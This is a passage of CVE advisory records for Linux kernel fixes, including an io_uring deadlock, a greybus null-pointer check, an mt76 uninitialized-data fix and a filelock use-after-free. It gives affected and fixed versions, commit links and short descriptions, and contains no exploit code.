          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix possible deadlock in io_register_iowq_max_workers()\n\nThe io_register_iowq_max_workers() function calls io_put_sq_data(),\nwhich acquires the sqd-\u003elock without releasing the uring_lock.\nSimilar to the commit 009ad9f0c6ee (\"io_uring: drop ctx-\u003euring_lock\nbefore acquiring sqd-\u003elock\"), this can lead to a potential deadlock\nsituation.\n\nTo resolve this issue, the uring_lock is released before calling\nio_put_sq_data(), and then it is re-acquired after the function call.\n\nThis change ensures that the locks are acquired in the correct\norder, preventing the possibility of a deadlock."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:21:37.834Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b17397a0a5c56e111f61cb5b77d162664dc00de9"
        },
        {
          "url": "https://git.kernel.org/stable/c/97ed7ff58de66c544692b3c2b988f3f594348de0"
        },
        {
          "url": "https://git.kernel.org/stable/c/fdacd09f2ddf7a00787291f08ee48c0421e5b709"
        },
        {
          "url": "https://git.kernel.org/stable/c/950ac86cff338ab56e2eaf611f4936ee34893b63"
        },
        {
          "url": "https://git.kernel.org/stable/c/b571a367502c7ef94c688ef9c7f7d69a2ce3bcca"
        },
        {
          "url": "https://git.kernel.org/stable/c/73254a297c2dd094abec7c9efee32455ae875bdf"
        }
      ],
      "title": "io_uring: fix possible deadlock in io_register_iowq_max_workers()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41080",
    "datePublished": "2024-07-29T15:04:17.642Z",
    "dateReserved": "2024-07-12T12:17:45.633Z",
    "dateUpdated": "2025-11-03T22:00:38.428Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-38637 (GCVE-0-2024-38637)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:18 – Updated: 2025-11-04 17:21

Title

greybus: lights: check return of get_channel_from_mode

Summary

In the Linux kernel, the following vulnerability has been resolved: greybus: lights: check return of get_channel_from_mode If channel for the given node is not found we return null from get_channel_from_mode. Make sure we validate the return pointer before using it in two of the missing places. This was originally reported in [0]: Found by Linux Verification Center (linuxtesting.org) with SVACE. [0] https://lore.kernel.org/all/20240301190425.120605-1-m.lobanov@rosalinux.ru

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8f4a76d477f0cc3c5…
	https://git.kernel.org/stable/c/e2c64246e5dc8c0d3…
	https://git.kernel.org/stable/c/eac10cf3a97ffd4b4…
	https://git.kernel.org/stable/c/330f6bcdcef03f70f…
	https://git.kernel.org/stable/c/9b41a9b9c8be8c552…
	https://git.kernel.org/stable/c/518e2c46b5dbce40b…
	https://git.kernel.org/stable/c/895cdd9aa9546523d…
	https://git.kernel.org/stable/c/a1ba19a1ae7cd1e32…

Impacted products

Vendor

Product

Version

Linux

Affected: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 , < 8f4a76d477f0cc3c54d512f07f6f88c8e1c1e07b (git)
Affected: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 , < e2c64246e5dc8c0d35ec41770b85e2b4cafdff21 (git)
Affected: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 , < eac10cf3a97ffd4b4deb0a29f57c118225a42850 (git)
Affected: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 , < 330f6bcdcef03f70f81db5f2ed6747af656a09f2 (git)
Affected: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 , < 9b41a9b9c8be8c552f10633453fdb509e83b66f8 (git)
Affected: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 , < 518e2c46b5dbce40b1aa0100001d03c3ceaa7d38 (git)
Affected: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 , < 895cdd9aa9546523df839f9cc1488a0ecc1e0731 (git)
Affected: 2870b52bae4c81823ffcb3ed2b0626fb39d64f48 , < a1ba19a1ae7cd1e324685ded4ab563e78fe68648 (git)

Linux

Affected: 4.9
Unaffected: 0 , < 4.9 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:21:54.586Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8f4a76d477f0cc3c54d512f07f6f88c8e1c1e07b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e2c64246e5dc8c0d35ec41770b85e2b4cafdff21"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/eac10cf3a97ffd4b4deb0a29f57c118225a42850"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/330f6bcdcef03f70f81db5f2ed6747af656a09f2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9b41a9b9c8be8c552f10633453fdb509e83b66f8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/518e2c46b5dbce40b1aa0100001d03c3ceaa7d38"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/895cdd9aa9546523df839f9cc1488a0ecc1e0731"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a1ba19a1ae7cd1e324685ded4ab563e78fe68648"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38637",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:08:59.285414Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:44.356Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/staging/greybus/light.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8f4a76d477f0cc3c54d512f07f6f88c8e1c1e07b",
              "status": "affected",
              "version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
              "versionType": "git"
            },
            {
              "lessThan": "e2c64246e5dc8c0d35ec41770b85e2b4cafdff21",
              "status": "affected",
              "version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
              "versionType": "git"
            },
            {
              "lessThan": "eac10cf3a97ffd4b4deb0a29f57c118225a42850",
              "status": "affected",
              "version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
              "versionType": "git"
            },
            {
              "lessThan": "330f6bcdcef03f70f81db5f2ed6747af656a09f2",
              "status": "affected",
              "version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
              "versionType": "git"
            },
            {
              "lessThan": "9b41a9b9c8be8c552f10633453fdb509e83b66f8",
              "status": "affected",
              "version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
              "versionType": "git"
            },
            {
              "lessThan": "518e2c46b5dbce40b1aa0100001d03c3ceaa7d38",
              "status": "affected",
              "version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
              "versionType": "git"
            },
            {
              "lessThan": "895cdd9aa9546523df839f9cc1488a0ecc1e0731",
              "status": "affected",
              "version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
              "versionType": "git"
            },
            {
              "lessThan": "a1ba19a1ae7cd1e324685ded4ab563e78fe68648",
              "status": "affected",
              "version": "2870b52bae4c81823ffcb3ed2b0626fb39d64f48",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/staging/greybus/light.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.9"
            },
            {
              "lessThan": "4.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngreybus: lights: check return of get_channel_from_mode\n\nIf channel for the given node is not found we return null from\nget_channel_from_mode. Make sure we validate the return pointer\nbefore using it in two of the missing places.\n\nThis was originally reported in [0]:\nFound by Linux Verification Center (linuxtesting.org) with SVACE.\n\n[0] https://lore.kernel.org/all/20240301190425.120605-1-m.lobanov@rosalinux.ru"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:15:55.660Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8f4a76d477f0cc3c54d512f07f6f88c8e1c1e07b"
        },
        {
          "url": "https://git.kernel.org/stable/c/e2c64246e5dc8c0d35ec41770b85e2b4cafdff21"
        },
        {
          "url": "https://git.kernel.org/stable/c/eac10cf3a97ffd4b4deb0a29f57c118225a42850"
        },
        {
          "url": "https://git.kernel.org/stable/c/330f6bcdcef03f70f81db5f2ed6747af656a09f2"
        },
        {
          "url": "https://git.kernel.org/stable/c/9b41a9b9c8be8c552f10633453fdb509e83b66f8"
        },
        {
          "url": "https://git.kernel.org/stable/c/518e2c46b5dbce40b1aa0100001d03c3ceaa7d38"
        },
        {
          "url": "https://git.kernel.org/stable/c/895cdd9aa9546523df839f9cc1488a0ecc1e0731"
        },
        {
          "url": "https://git.kernel.org/stable/c/a1ba19a1ae7cd1e324685ded4ab563e78fe68648"
        }
      ],
      "title": "greybus: lights: check return of get_channel_from_mode",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38637",
    "datePublished": "2024-06-21T10:18:25.560Z",
    "dateReserved": "2024-06-18T19:36:34.948Z",
    "dateUpdated": "2025-11-04T17:21:54.586Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42225 (GCVE-0-2024-42225)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:47 – Updated: 2025-11-03 22:02

Title

wifi: mt76: replace skb_put with skb_put_zero

Summary

In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: replace skb_put with skb_put_zero Avoid potentially reusing uninitialized data

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/dc7f14d00d0c4c218…
	https://git.kernel.org/stable/c/22ea2a7f0b64d3236…
	https://git.kernel.org/stable/c/ff6b26be13032c5fb…
	https://git.kernel.org/stable/c/64f86337ccfe77fe3…
	https://git.kernel.org/stable/c/7f819a2f4fbc510e0…

Impacted products

Vendor

Product

Version

Linux

Affected: 7bc04215a66b60e198aecaee8418f6d79fa19faa , < dc7f14d00d0c4c21898f3504607f4a31079065a2 (git)
Affected: 7bc04215a66b60e198aecaee8418f6d79fa19faa , < 22ea2a7f0b64d323625950414a4496520fb33657 (git)
Affected: 7bc04215a66b60e198aecaee8418f6d79fa19faa , < ff6b26be13032c5fbd6b6a0b24358f8eaac4f3af (git)
Affected: 7bc04215a66b60e198aecaee8418f6d79fa19faa , < 64f86337ccfe77fe3be5a9356b0dabde23fbb074 (git)
Affected: 7bc04215a66b60e198aecaee8418f6d79fa19faa , < 7f819a2f4fbc510e088b49c79addcf1734503578 (git)

Linux

Affected: 4.16
Unaffected: 0 , < 4.16 (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:28.980Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dc7f14d00d0c4c21898f3504607f4a31079065a2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/22ea2a7f0b64d323625950414a4496520fb33657"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ff6b26be13032c5fbd6b6a0b24358f8eaac4f3af"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/64f86337ccfe77fe3be5a9356b0dabde23fbb074"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7f819a2f4fbc510e088b49c79addcf1734503578"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42225",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:14:38.019669Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:33.317Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c",
            "drivers/net/wireless/mediatek/mt76/mt7915/mcu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "dc7f14d00d0c4c21898f3504607f4a31079065a2",
              "status": "affected",
              "version": "7bc04215a66b60e198aecaee8418f6d79fa19faa",
              "versionType": "git"
            },
            {
              "lessThan": "22ea2a7f0b64d323625950414a4496520fb33657",
              "status": "affected",
              "version": "7bc04215a66b60e198aecaee8418f6d79fa19faa",
              "versionType": "git"
            },
            {
              "lessThan": "ff6b26be13032c5fbd6b6a0b24358f8eaac4f3af",
              "status": "affected",
              "version": "7bc04215a66b60e198aecaee8418f6d79fa19faa",
              "versionType": "git"
            },
            {
              "lessThan": "64f86337ccfe77fe3be5a9356b0dabde23fbb074",
              "status": "affected",
              "version": "7bc04215a66b60e198aecaee8418f6d79fa19faa",
              "versionType": "git"
            },
            {
              "lessThan": "7f819a2f4fbc510e088b49c79addcf1734503578",
              "status": "affected",
              "version": "7bc04215a66b60e198aecaee8418f6d79fa19faa",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c",
            "drivers/net/wireless/mediatek/mt76/mt7915/mcu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.16"
            },
            {
              "lessThan": "4.16",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: replace skb_put with skb_put_zero\n\nAvoid potentially reusing uninitialized data"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:24:33.024Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/dc7f14d00d0c4c21898f3504607f4a31079065a2"
        },
        {
          "url": "https://git.kernel.org/stable/c/22ea2a7f0b64d323625950414a4496520fb33657"
        },
        {
          "url": "https://git.kernel.org/stable/c/ff6b26be13032c5fbd6b6a0b24358f8eaac4f3af"
        },
        {
          "url": "https://git.kernel.org/stable/c/64f86337ccfe77fe3be5a9356b0dabde23fbb074"
        },
        {
          "url": "https://git.kernel.org/stable/c/7f819a2f4fbc510e088b49c79addcf1734503578"
        }
      ],
      "title": "wifi: mt76: replace skb_put with skb_put_zero",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42225",
    "datePublished": "2024-07-30T07:47:06.397Z",
    "dateReserved": "2024-07-30T07:40:12.250Z",
    "dateUpdated": "2025-11-03T22:02:28.980Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41012 (GCVE-0-2024-41012)

Vulnerability from cvelistv5 – Published: 2024-07-23 08:06 – Updated: 2025-11-03 21:59

Title

filelock: Remove locks reliably when fcntl/close race is detected

Summary

In the Linux kernel, the following vulnerability has been resolved: filelock: Remove locks reliably when fcntl/close race is detected When fcntl_setlk() races with close(), it removes the created lock with do_lock_file_wait(). However, LSMs can allow the first do_lock_file_wait() that created the lock while denying the second do_lock_file_wait() that tries to remove the lock. Separately, posix_lock_file() could also fail to remove a lock due to GFP_KERNEL allocation failure (when splitting a range in the middle). After the bug has been triggered, use-after-free reads will occur in lock_get_status() when userspace reads /proc/locks. This can likely be used to read arbitrary kernel memory, but can't corrupt kernel memory. Fix it by calling locks_remove_posix() instead, which is designed to reliably get rid of POSIX locks associated with the given file and files_struct and is also used by filp_flush().

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d30ff33040834c3b9…
	https://git.kernel.org/stable/c/dc2ce1dfceaa07672…
	https://git.kernel.org/stable/c/5661b9c7ec189406c…
	https://git.kernel.org/stable/c/52c87ab18c76c14d7…
	https://git.kernel.org/stable/c/ef8fc41cd6f95f9a4…
	https://git.kernel.org/stable/c/5f5d0799eb0a01d55…
	https://git.kernel.org/stable/c/b6d223942c34057fd…
	https://git.kernel.org/stable/c/3cad1bc010416c6dd…

Impacted products

Vendor

Product

Version

Linux

Affected: c293621bbf678a3d85e3ed721c3921c8a670610d , < d30ff33040834c3b9eee29740acd92f9c7ba2250 (git)
Affected: c293621bbf678a3d85e3ed721c3921c8a670610d , < dc2ce1dfceaa0767211a9d963ddb029ab21c4235 (git)
Affected: c293621bbf678a3d85e3ed721c3921c8a670610d , < 5661b9c7ec189406c2dde00837aaa4672efb6240 (git)
Affected: c293621bbf678a3d85e3ed721c3921c8a670610d , < 52c87ab18c76c14d7209646ccb3283b3f5d87b22 (git)
Affected: c293621bbf678a3d85e3ed721c3921c8a670610d , < ef8fc41cd6f95f9a4a3470f085aecf350569a0b3 (git)
Affected: c293621bbf678a3d85e3ed721c3921c8a670610d , < 5f5d0799eb0a01d550c21b7894e26b2d9db55763 (git)
Affected: c293621bbf678a3d85e3ed721c3921c8a670610d , < b6d223942c34057fdfd8f149e763fa823731b224 (git)
Affected: c293621bbf678a3d85e3ed721c3921c8a670610d , < 3cad1bc010416c6dd780643476bc59ed742436b9 (git)

Linux

Affected: 2.6.13
Unaffected: 0 , < 2.6.13 (semver)
Unaffected: 4.19.319 , ≤ 4.19.* (semver)
Unaffected: 5.4.281 , ≤ 5.4.* (semver)
Unaffected: 5.10.223 , ≤ 5.10.* (semver)
Unaffected: 5.15.164 , ≤ 5.15.* (semver)
Unaffected: 6.1.101 , ≤ 6.1.* (semver)
Unaffected: 6.6.42 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:16.069Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d30ff33040834c3b9eee29740acd92f9c7ba2250"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dc2ce1dfceaa0767211a9d963ddb029ab21c4235"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5661b9c7ec189406c2dde00837aaa4672efb6240"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/52c87ab18c76c14d7209646ccb3283b3f5d87b22"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ef8fc41cd6f95f9a4a3470f085aecf350569a0b3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5f5d0799eb0a01d550c21b7894e26b2d9db55763"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b6d223942c34057fdfd8f149e763fa823731b224"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3cad1bc010416c6dd780643476bc59ed742436b9"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41012",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:25:02.584247Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:06.422Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/locks.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d30ff33040834c3b9eee29740acd92f9c7ba2250",
              "status": "affected",
              "version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
              "versionType": "git"
            },
            {
              "lessThan": "dc2ce1dfceaa0767211a9d963ddb029ab21c4235",
              "status": "affected",
              "version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
              "versionType": "git"
            },
            {
              "lessThan": "5661b9c7ec189406c2dde00837aaa4672efb6240",
              "status": "affected",
              "version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
              "versionType": "git"
            },
            {
              "lessThan": "52c87ab18c76c14d7209646ccb3283b3f5d87b22",
              "status": "affected",
              "version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
              "versionType": "git"
            },
            {
              "lessThan": "ef8fc41cd6f95f9a4a3470f085aecf350569a0b3",
              "status": "affected",
              "version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
              "versionType": "git"
            },
            {
              "lessThan": "5f5d0799eb0a01d550c21b7894e26b2d9db55763",
              "status": "affected",
              "version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
              "versionType": "git"
            },
            {
              "lessThan": "b6d223942c34057fdfd8f149e763fa823731b224",
              "status": "affected",
              "version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
              "versionType": "git"
            },
            {
              "lessThan": "3cad1bc010416c6dd780643476bc59ed742436b9",
              "status": "affected",
              "version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/locks.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.13"
            },
            {
              "lessThan": "2.6.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
